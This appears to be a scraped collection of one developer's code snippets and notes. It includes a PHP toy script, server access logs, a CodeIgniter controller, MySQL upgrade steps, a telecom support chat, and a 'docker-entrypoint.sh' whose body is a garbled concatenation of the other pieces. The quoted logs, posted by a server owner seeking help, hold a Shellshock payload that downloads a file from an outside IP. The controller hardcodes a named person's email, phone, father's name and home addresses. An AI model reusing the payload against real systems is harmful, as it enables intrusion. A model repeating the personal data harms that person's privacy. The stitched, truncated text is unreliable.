Sandeep Kumar vishwakarma09

## hello.php
#some php code
##with some markdown

```php
echo  "waoo"
for($i=0; $i<=10;$i++){
  sleep(1);
}

echo "bye";

## hello.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                vishwakarma09
                / hello.md
            
            
              Last active
              October 5, 2015 06:40
            
              
                another post with markdown extension
              
          
    #some php code
##with some markdown
echo  "waoo"
for($i=0; $i<=10;$i++){
  sleep(1);
}

echo "bye";

  
## apache.log
I am seeing series of attacks on my server. When I check the access logs, I see this pattern

66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"
54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
202.100.92.36 - - [17/Jan/2016:04:35:21 +0000] "HEAD / HTTP/1.0" 200 245 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET /muieblackcat HTTP/1.1" 404 467 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"

## reply to david
Hi David,

My server was compromised a few days back. Would you like to take a look. Here are a few access logs:

120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http

## edit_user.php
<section id="content">
                <div class="container">
                    <div class="block-header">
                        <h2>Manage Users</h2>
                    </div>

										 <div class="card" id="profile-main">
											<div class="pm-overview c-overflow mCustomScrollbar _mCS_3 mCS-autoHide" style="overflow: visible;"><div id="mCSB_3" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_3_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" style="position: relative; top: 0px; left: 0px; width: 100%;" dir="ltr">
                            <div class="pmo-pic">
                                <div class="p-relative">

## User.php
<?php

ini_set('display_errors','On');
error_reporting(E_ALL);

class User extends CI_Controller {

	public function index()
	{
		$userDetails = '{"status":"SUCCESS","id":25,"message":null,"responseSize":1,"response":{"id":25,"hash":null,"name":"Arindam Nath","firstName":null,"middleName":null,"lastName":null,"email":"strider2023@gmail.com","phoneNumber":"9874381131","accountType":"USER","gender":"MALE","dob":630143205000,"maritalStatus":"SINGLE","workStatus":"SALARIED","residentialStatus":"RENTAL","deviceData":null,"userImage":"https:\/\/s3-ap-southeast-1.amazonaws.com\/mbv-pokket\/user-images\/user_profile_25_userImage_1459410437667.jpg","referralCode":null,"fatherName":"Aroon Nath","gcmId":null,"roleType":"LEND","rating":null,"defaults":null,"userLocationDatas":[{"id":70,"userId":25,"address":"House No. 34, Chooliemedu","city":"Chennai","state":"Tamil Nadu","country":"India","pincode":600034,"type":"HOME","isVerified":true},{"id":50,"userId":25,"address":"Chatterjee Bagan","city":"Hooghly","state":"West

## edit_user.php
<section id="content">
                <div class="container">
                    <div class="block-header">
                        <h2>Manage Users</h2>
                    </div>

										 <div class="card" id="profile-main">
											<div class="pm-overview c-overflow mCustomScrollbar _mCS_3 mCS-autoHide" style="overflow: visible;"><div id="mCSB_3" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_3_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" style="position: relative; top: 0px; left: 0px; width: 100%;" dir="ltr">
                            <div class="pmo-pic">
                                <div class="p-relative">

## install magento2 on ubuntu
#upgrade mysql 5.6
mysqldump --lock-all-tables -u root -p --all-databases > dump.sql
apt-get purge mysql-server-5.5 mysql-client-5.5
apt-get autoremove
apt-get install mysql-server-5.6 mysql-client-5.6

This was spine chilling because even after mysql upgrade, the version was showing 5.5.
I had to reboot system and yay! all good.

#upgrade php 5.6

## mts
12:35 PM	Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly.
12:36 PM	Connected to the call center
Manisha Jaiswal	Welcome to MTS, How may I help you?
Sandeep Kumar  	12:29 PM	Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:29 PM Connected to the call center YOGESH KUMAR  MISHRA Welcome to MTS, How may I help you? Sandeep Kumar   12:18 PM	Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:18 PM Connected to the call center JAGRATI PANDEY	Welcome to MTS, How may I help you? Sandeep Kumar  	Hi Sandeep Kumar  	help me with my bill JAGRATI PANDEY	Yes ,please let me know how can I help you? Sandeep Kumar  	Last month I paid full 803 Sandeep Kumar  	my plan is 599 JAGRATI PANDEY	Definitely , I will assist you in this regard. JAGRATI PANDEY	May I please request you to confirm your full name and MTS number? Sandeep Kumar  	this time

## docker-entrypoint.sh
#!/bin/bash
set -eo pipefail
shopt -s nullglob

# if command starts with an option, prepend mysqld
if [ "${1:0:1}" = '-' ]; then
	set -- mysqld "$@"
fi

# skip setup if they want an option that stops mysqld
	#some php code
	##with some markdown

	```php
	echo "waoo"
	for($i=0; $i<=10;$i++){
	sleep(1);
	}

	echo "bye";
	I am seeing series of attacks on my server. When I check the access logs, I see this pattern

	66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
	185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"
	54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
	202.100.92.36 - - [17/Jan/2016:04:35:21 +0000] "HEAD / HTTP/1.0" 200 245 "-" "-"
	185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET /muieblackcat HTTP/1.1" 404 467 "-" "-"
	185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
	185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
	185.130.5.235 - - [17/Jan/2016:04:49:02 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
	Hi David,

	My server was compromised a few days back. Would you like to take a look. Here are a few access logs:

	120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

	120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http
	<section id="content">
	<div class="container">
	<div class="block-header">
	<h2>Manage Users</h2>
	</div>

	<div class="card" id="profile-main">
	<div class="pm-overview c-overflow mCustomScrollbar _mCS_3 mCS-autoHide" style="overflow: visible;"><div id="mCSB_3" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_3_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" style="position: relative; top: 0px; left: 0px; width: 100%;" dir="ltr">
	<div class="pmo-pic">
	<div class="p-relative">
	<?php

	ini_set('display_errors','On');
	error_reporting(E_ALL);

	class User extends CI_Controller {

	public function index()
	{
	$userDetails = '{"status":"SUCCESS","id":25,"message":null,"responseSize":1,"response":{"id":25,"hash":null,"name":"Arindam Nath","firstName":null,"middleName":null,"lastName":null,"email":"strider2023@gmail.com","phoneNumber":"9874381131","accountType":"USER","gender":"MALE","dob":630143205000,"maritalStatus":"SINGLE","workStatus":"SALARIED","residentialStatus":"RENTAL","deviceData":null,"userImage":"https:\/\/s3-ap-southeast-1.amazonaws.com\/mbv-pokket\/user-images\/user_profile_25_userImage_1459410437667.jpg","referralCode":null,"fatherName":"Aroon Nath","gcmId":null,"roleType":"LEND","rating":null,"defaults":null,"userLocationDatas":[{"id":70,"userId":25,"address":"House No. 34, Chooliemedu","city":"Chennai","state":"Tamil Nadu","country":"India","pincode":600034,"type":"HOME","isVerified":true},{"id":50,"userId":25,"address":"Chatterjee Bagan","city":"Hooghly","state":"West
	#upgrade mysql 5.6
	mysqldump --lock-all-tables -u root -p --all-databases > dump.sql
	apt-get purge mysql-server-5.5 mysql-client-5.5
	apt-get autoremove
	apt-get install mysql-server-5.6 mysql-client-5.6

	This was spine chilling because even after mysql upgrade, the version was showing 5.5.
	I had to reboot system and yay! all good.

	#upgrade php 5.6
	12:35 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly.
	12:36 PM Connected to the call center
	Manisha Jaiswal Welcome to MTS, How may I help you?
	Sandeep Kumar 12:29 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:29 PM Connected to the call center YOGESH KUMAR MISHRA Welcome to MTS, How may I help you? Sandeep Kumar 12:18 PM Thank you for connecting with MTS Chat4help. We appreciate your patience. Your query will be answered shortly. 12:18 PM Connected to the call center JAGRATI PANDEY Welcome to MTS, How may I help you? Sandeep Kumar Hi Sandeep Kumar help me with my bill JAGRATI PANDEY Yes ,please let me know how can I help you? Sandeep Kumar Last month I paid full 803 Sandeep Kumar my plan is 599 JAGRATI PANDEY Definitely , I will assist you in this regard. JAGRATI PANDEY May I please request you to confirm your full name and MTS number? Sandeep Kumar this time
	#!/bin/bash
	set -eo pipefail
	shopt -s nullglob

	# if command starts with an option, prepend mysqld
	if [ "${1:0:1}" = '-' ]; then
	set -- mysqld "$@"
	fi

	# skip setup if they want an option that stops mysqld